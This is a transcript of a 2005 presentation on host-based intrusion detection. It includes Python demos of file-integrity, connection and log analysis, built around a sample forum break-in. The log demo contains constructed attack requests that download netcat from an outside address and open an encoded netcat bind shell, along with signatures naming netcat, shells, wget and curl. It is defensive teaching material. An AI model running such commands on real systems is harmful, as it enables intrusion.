Host-based Intrusion Detection Systems (HIDS) - Pieter de Boer - PowerPoint PPT Presentation



SLIDE 1

Host-based Intrusion Detection Systems (HIDS)

Pieter de Boer, Martin Pels, 09/02/2005

SLIDE 2

Contents

09/02/2005 Host-based Intrusion Detection Systems 2/8

  • HIDS-types
  • Example break-in
  • Protection using HIDS
  • Evasion possibilities
  • Evasion prevention
  • Conclusion
SLIDE 3

HIDS-types

  • Filesystem monitoring ➔ AIDE, mtree
  • Logfile analysis ➔ Swatch, SEC
  • Connection analysis ➔ Scanlogd, PortSentry
  • Kernel-based IDS (process monitoring etc.) ➔ IDSpbr, LIDS
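A worked example of the first type, filesystem monitoring, added here as an illustration; it is not code from the presentation and not AIDE or mtree themselves. It baselines a directory tree (content hash plus the metadata a rootkit would alter), rescans, and reports files added, removed or changed, replayed against the break-in the later slides describe. All paths and file contents are constructed placeholders in a temporary directory, not real system files.

```python
"""AIDE/mtree-style file integrity check: baseline a tree, rescan, report differences."""
import hashlib
import os
import stat
import tempfile


def file_record(path):
    """Attributes recorded per file: content hash plus the metadata a rootkit or chmod would alter."""
    st = os.lstat(path)
    digest = hashlib.sha256()
    if stat.S_ISREG(st.st_mode):
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
    return {
        "sha256": digest.hexdigest(),
        "size": st.st_size,
        "mode": stat.S_IMODE(st.st_mode),
        "uid": st.st_uid,
        "gid": st.st_gid,
        "mtime_ns": st.st_mtime_ns,
    }


def build_baseline(root):
    """Walk root and record every file under its path relative to root."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            baseline[os.path.relpath(path, root)] = file_record(path)
    return baseline


def compare(baseline, current):
    """Return (added, removed, changed); changed maps a path to the attributes that differ."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for rel in sorted(set(baseline) & set(current)):
        diffs = [k for k, v in baseline[rel].items() if current[rel][k] != v]
        if diffs:
            changed[rel] = diffs
    return added, removed, changed


def demo():
    """Replay the slides' break-in on a constructed directory tree (placeholder paths and contents)."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)

        # Clean state: the forum and one system binary.
        write("var/www/forum/index.php", b"<?php /* forum */ ?>")
        write("usr/bin/ls", b"ELF placeholder: original ls")
        baseline = build_baseline(root)

        # Break-in: uploaded PHP file, downloaded netcat, rootkit replaces ls.
        # The trojaned ls is deliberately the same size as the original: size and
        # mtime alone can be faked (truncate, touch -r), the hash cannot.
        write("var/www/forum/uploads/shell.php", b"<?php /* uploaded */ ?>")
        write("tmp/nc", b"ELF placeholder: netcat")
        write("usr/bin/ls", b"ELF placeholder: trojaned ls")
        added, removed, changed = compare(baseline, build_baseline(root))

        # Evasion from the slides: a tool created and deleted between two scheduled
        # scans leaves nothing for a periodic scan to find (the case for real-time monitoring).
        after_attack = build_baseline(root)
        write("tmp/exploit", b"ELF placeholder: root exploit")
        os.remove(os.path.join(root, "tmp", "exploit"))
        missed = compare(after_attack, build_baseline(root))

    return {"added": added, "removed": removed, "changed": changed, "missed_after_cleanup": missed}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The scan reports the uploaded PHP file and the netcat binary as added and `usr/bin/ls` as changed (hash differs even though the size does not), while the exploit that was removed before the next scan produces no finding at all.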


SLIDE 4

Example break-in

  1) Bug in forum: uploading & executing PHP code
  2) Downloading netcat through the PHP file
  3) Binding netcat to a port --> shell
  4) Executing a root exploit in the shell
  5) Installing a rootkit, etc.

SLIDE 5

Protection using HIDS

  • Logfile analysis ➔ Detection of the PHP file upload and of netcat execution
  • File monitoring ➔ Detection of new files (PHP file & netcat binary) and of the installed rootkit
  • Connection analysis ➔ Detection of unauthorized daemons
  • Kernel-based IDS ➔ Detection of root-exploit execution
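A worked example of the connection analysis item, added here as an illustration (it is not code from the presentation and not Scanlogd or PortSentry). It parses a snapshot in `/proc/net/tcp` format and reports listening sockets on ports outside an allowlist, the "unauthorized daemons" of this slide. It goes one step further than the slide by also reporting established connections this host initiated towards addresses outside the allowed networks, which is the evasion (netcat connecting out instead of listening) and the countermeasure the evasion and prevention slides name. The snapshot, the allowlists and the uid values are constructed.

```python
"""Connection analysis over a /proc/net/tcp snapshot: unexpected listeners and outbound connections."""
import ipaddress
import socket
import struct

TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN"}  # the two states this check cares about

# Constructed snapshot in /proc/net/tcp format. Addresses are hex in host byte order,
# so little-endian on x86: "0500000A" is 10.0.0.5. Rows: sshd :22, apache :80, an
# unexpected listener :31337 run as uid 33, an inbound ssh session, an outbound SMTP
# connection inside the LAN, and an outbound connection from uid 33 to 203.0.113.9:4444.
PROC_NET_TCP = "\n".join([
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode",
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0000000000000000 100 0 0 10 0",
    "   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1002 1 0000000000000000 100 0 0 10 0",
    "   2: 00000000:7A69 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 2001 1 0000000000000000 100 0 0 10 0",
    "   3: 0500000A:0016 0A00000A:D431 01 00000000:00000000 00:00000000 00000000     0        0 1003 1 0000000000000000 20 4 30 10 -1",
    "   4: 0500000A:9C41 1400000A:0019 01 00000000:00000000 00:00000000 00000000     0        0 1004 1 0000000000000000 20 4 30 10 -1",
    "   5: 0500000A:9C40 097100CB:115C 01 00000000:00000000 00:00000000 00000000    33        0 2002 1 0000000000000000 20 4 30 10 -1",
])

ALLOWED_PORTS = {22, 80, 443}                      # daemons that are supposed to listen (assumed)
ALLOWED_NETWORKS = ["10.0.0.0/8", "127.0.0.0/8"]   # destinations this host may talk to (assumed)


def decode_endpoint(hexaddr):
    """'0100007F:0016' -> ('127.0.0.1', 22); IPv4 only."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Return one dict per socket with local/remote endpoints, state name and owning uid."""
    sockets = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        sockets.append({
            "local": decode_endpoint(fields[1]),
            "remote": decode_endpoint(fields[2]),
            "state": TCP_STATES.get(fields[3], fields[3]),
            "uid": int(fields[7]),
        })
    return sockets


def unauthorized_listeners(sockets, allowed_ports):
    """Listening sockets on ports outside the allowlist: the slide's unauthorized daemons."""
    return [s for s in sockets if s["state"] == "LISTEN" and s["local"][1] not in allowed_ports]


def outbound_connections(sockets, allowed_networks):
    """Established connections this host initiated towards addresses outside the allowed networks.

    A connection whose local port is one the host is listening on is a client talking to
    a local daemon (inbound); anything else on an ephemeral port was opened from here."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    listening_ports = {s["local"][1] for s in sockets if s["state"] == "LISTEN"}
    findings = []
    for s in sockets:
        if s["state"] != "ESTABLISHED" or s["local"][1] in listening_ports:
            continue
        if not any(ipaddress.ip_address(s["remote"][0]) in net for net in nets):
            findings.append(s)
    return findings


def analyze(text=PROC_NET_TCP):
    sockets = parse_proc_net_tcp(text)
    return {
        "listeners": unauthorized_listeners(sockets, ALLOWED_PORTS),
        "outbound": outbound_connections(sockets, ALLOWED_NETWORKS),
    }


if __name__ == "__main__":
    for kind, hits in analyze().items():
        for s in hits:
            print(kind, s["local"], "->", s["remote"], "uid", s["uid"])
```

On the constructed snapshot the listener check reports only port 31337 (uid 33, the web server's user, which should never run a daemon), and the outbound check reports only the session to 203.0.113.9:4444; the inbound ssh session and the LAN SMTP connection are left alone. A real deployment reads `/proc/net/tcp` and `/proc/net/tcp6` periodically and diffs against the previous run.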

SLIDE 6

Evasion possibilities

  • Logfile analysis ➔ Encoding of requests, so that fixed strings in the log no longer match
  • File monitoring ➔ Deletion of files after use, modifying the file monitor itself
  • Connection analysis ➔ Setting up a netcat connection to the outside instead of a listening port
  • Kernel-based IDS ➔ Use of exploits the IDS does not recognise

SLIDE 7

Evasion prevention

  • Logfile analysis ➔ Anomaly detection (flag requests that deviate from normal traffic instead of matching fixed strings), decoding requests before matching
  • File monitoring ➔ Real-time monitoring, placing the monitor (binary and baseline database) on read-only media
  • Connection analysis ➔ Detection of connections to the outside
  • Kernel-based IDS ➔ Anomaly detection
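A worked example of the logfile analysis thread running through the protection, evasion and prevention slides, added here as an illustration; it is not code from the presentation and not Swatch or SEC. It runs Swatch-style fixed signatures over Apache access-log lines, shows that the URL-encoded request for netcat slips past them, and shows the two countermeasures: decoding the request before matching, and an anomaly check that flags request paths never seen in a baseline window regardless of how the query is encoded. The log lines, signatures and paths are constructed; the forum and client addresses are placeholders.

```python
"""Logfile analysis over Apache access-log lines: fixed signatures, URL-decoding, path anomalies."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Swatch-style fixed signatures for the tools used in the slides' break-in (constructed).
SIGNATURES = {
    "netcat": re.compile(r"(?:^|[\s/=;|])(?:nc|netcat)(?:$|[\s&;|])"),
    "shell": re.compile(r"/bin/(?:ba)?sh"),
    "download": re.compile(r"\b(?:wget|curl)\b"),
}

# Constructed baseline window: normal forum traffic, including the forum's own upload feature.
BASELINE_LOG = "\n".join([
    '10.0.0.10 - - [09/Feb/2005:10:00:01 +0100] "GET /forum/index.php HTTP/1.1" 200 5120',
    '10.0.0.10 - - [09/Feb/2005:10:00:05 +0100] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 8120',
    '10.0.0.11 - - [09/Feb/2005:10:01:30 +0100] "POST /forum/upload.php HTTP/1.1" 200 312',
])
# Constructed incident: upload, fetch netcat through the uploaded file, then start it with a
# URL-encoded request ("%2e%2fnc%20%2dl..." decodes to "./nc -l...") to evade fixed strings.
INCIDENT_LOG = "\n".join([
    '203.0.113.9 - - [09/Feb/2005:10:02:11 +0100] "POST /forum/upload.php HTTP/1.1" 200 312',
    '203.0.113.9 - - [09/Feb/2005:10:02:20 +0100] "GET /forum/uploads/shell.php?c=wget%20http://203.0.113.9/nc HTTP/1.1" 200 88',
    '203.0.113.9 - - [09/Feb/2005:10:02:31 +0100] "GET /forum/uploads/shell.php?c=%2e%2fnc%20%2dl%20%2dp%2031337%20%2de%20%2fbin%2fsh HTTP/1.1" 200 12',
])


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize_uri(uri, rounds=3):
    """Percent-decode until stable (bounded), so double-encoded requests are matched in plain form."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def signature_matches(log_text, decode=True):
    """Run the fixed signatures over each request, on the raw URI or on the decoded one."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        target = normalize_uri(rec["uri"]) if decode else rec["uri"]
        for name, rx in SIGNATURES.items():
            if rx.search(target):
                findings.append({"line": lineno, "client": rec["client"], "signature": name})
    return findings


def request_paths(log_text):
    """Decoded request paths (query string dropped) seen in a log window."""
    paths = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            paths.add(normalize_uri(rec["uri"]).split("?", 1)[0])
    return paths


def anomalous_paths(baseline_text, log_text):
    """Anomaly check: paths never requested during the baseline window, however the query is encoded."""
    return sorted(request_paths(log_text) - request_paths(baseline_text))


if __name__ == "__main__":
    print("raw signatures:    ", signature_matches(INCIDENT_LOG, decode=False))
    print("decoded signatures:", signature_matches(INCIDENT_LOG))
    print("anomalous paths:   ", anomalous_paths(BASELINE_LOG, INCIDENT_LOG))
```

Matching on the raw request line catches only the `wget` download (incident line 2); the encoded netcat invocation on line 3 contains no plain "nc" or "/bin/sh" and is missed. Decoding first catches both, and the anomaly check reports `/forum/uploads/shell.php` without knowing anything about netcat, because that path never appeared in the baseline. Bounding the decode rounds matters: an attacker can nest encodings, and an unbounded loop is itself a resource-exhaustion target.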

SLIDE 8

Conclusion

  • HIDS are not perfect: every type shown here can be evaded
  • Despite this they can certainly be useful, especially when several types are combined
